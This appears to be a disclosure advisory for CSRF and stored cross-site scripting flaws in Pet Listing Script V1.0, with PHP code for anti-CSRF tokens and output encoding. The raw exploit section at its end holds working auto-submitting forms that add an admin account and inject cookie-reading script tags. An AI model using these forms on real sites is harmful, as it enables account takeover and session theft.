Vendor: Pet Listing Script
By: HackXBack
CVSS: 8,8 (HIGH)
Vulnerability: Cross Site Request Forgery, Multiple Cross Site Scripting
CWE: 352, 79
Product Name: Pet Listing Script
Affected Version From: V1.0
Affected Version To: V1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:phpjabbers:pet_listing_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Pet Listing Script V1.0 – Multiple Vulnerabilities

Pet Listing Script V1.0 is vulnerable to Cross Site Request Forgery and multiple Cross Site Scripting issues. The admin create actions (AdminUsers, AdminTypes, AdminBreeds, AdminExtras) accept POST requests built from a crafted HTML form of hidden input fields, with no token tying the request to the administrator's own session, so a page that auto-submits such a form can add an admin account. The same kind of form can submit a script tag in the type, breed, or extra title fields; the injected JavaScript can be used to steal the user's cookies and gain access to the application.

Mitigation:

The application should require a secure random token on each request to verify that the request is authentic. The application should also validate all user input and sanitize it before displaying it to the user.
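
One way to implement both mitigations in PHP, as an added example that is not part of the original advisory or of the vendor's code. The helper names (`csrf_token`, `csrf_field`, `csrf_check`, `e`) and the `csrf_token` field name are assumptions; the sample request is constructed from the field names in the advisory's PoC.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not part of Pet Listing Script) showing the two fixes.

/** Return the per-session anti-CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit CSPRNG value
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every state-changing admin form. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="' . csrf_token() . '"/>';
}

/** True only if the submitted token matches the session token (constant-time compare). */
function csrf_check(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

/** Encode a stored title for an HTML text or quoted-attribute context. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- Constructed demo using the field names from the advisory's PoC ---
$_SESSION = [];          // stand-in for session_start() so the demo runs on the CLI
$form   = csrf_field();  // what the genuine admin form would contain
$forged = ['type_create' => '1', 'type_title' => '<script>alert(document.cookie);</script>'];
$legit  = $forged + ['csrf_token' => $_SESSION['csrf_token']];

var_dump(csrf_check($forged));          // cross-site form: carries no token
var_dump(csrf_check($legit));           // form rendered inside the admin session
echo e($legit['type_title']), PHP_EOL;  // title is output as inert text
```

In the application, `csrf_check($_POST)` would run before any `create` action is processed, and `e()` would wrap every title where it is written into a page.
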

Exploit-DB raw data:

Pet Listing Script V1.0 - Multiple Vulnerabilities
====================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/pet-listing-script/
####################################################################

===[ Exploit ]===

[1] Cross Site Request Forgery
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminUsers&action=create">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="Password"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html>

[2] Multiple Cross Site Scripting
==================================

# CSRF with XSS Exploit:

I. Xss In Type

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminTypes&action=create">
<input type="hidden" name="type_create" value="1"/>
<input type="hidden" name="type_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>

II. Xss In Breed

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminBreeds&action=create">
<input type="hidden" name="breed_create" value="1"/>
<input type="hidden" name="breed_title"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="type_id" value="2"/>
</form>
</body>
</html>

III. Xss In Extra

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminExtras&action=create">
<input type="hidden" name="extra_create" value="1"/>
<input type="hidden" name="extra_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>
####################################################################